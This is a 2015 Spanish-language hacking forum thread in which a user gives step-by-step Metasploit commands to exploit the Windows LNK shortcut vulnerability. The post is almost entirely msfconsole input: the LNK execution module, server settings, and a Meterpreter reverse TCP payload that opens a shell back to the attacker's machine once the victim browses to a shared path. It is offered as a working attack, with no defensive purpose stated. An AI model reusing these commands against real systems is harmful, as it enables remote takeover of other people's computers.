WINTXCODERS Terminal
[visitante@wintxcoders-pc ~]:$ Bienvenido a la comunidad
Recuerda que puedes participar en nuestra comunidad registrándote

Metasploit [Explotar Vulnerailidad LNK]

Iniciado por PAYASAKX, Febrero 01, 2015, 01:43:56 AM

« anterior - próximo »

PAYASAKX

Maestro

  • Desconectado
  • Febrero 01, 2015, 01:43:56 AM Last Edit: Marzo 23, 2015, 10:28:52 PM by Payasako.
    Hola a todos de WintxCoders, hoy os voy a explicar y poner los pasos para explotar la vulnerabilidad LNK de Windows con Metasploit.

    Ejecutamos
    Citarmsf > use windows/browser/ms10_xxx_windows_shell_lnk_execute msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.0.33 SRVHOST => 192.168.0.33 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVPORT 80 SRVPORT => 80 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set URIPATH / URIPATH => / msf exploit(ms10_xxx_windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LHOST 192.168.0.33 LHOST => 192.168.0.33 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LPORT 4444 LPORT => 4444 msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit

    Despues en la Pc de la víctima ejecutamos:
    Citar\192.168.0.33QueHeTwEW

    Y Cuando se abra el explorador de windows, que tienen el archivo .Lnk ..

    Para especificar una dirección diferente para el recurso compartido agregamos este parámetro en la configuración:
    Citarmsf exploit(ms10_xxx_windows_shell_lnk_execute) > set UNCHOST 192.168.0.254 UNCHOST => 192.168.0.254

    Bueno espero que os haya ayudado. ¡Saludos!

    #i[J]0SEE

    Maestro

  • Desconectado
  • No tenía ni idea de esas vulneridades LNK.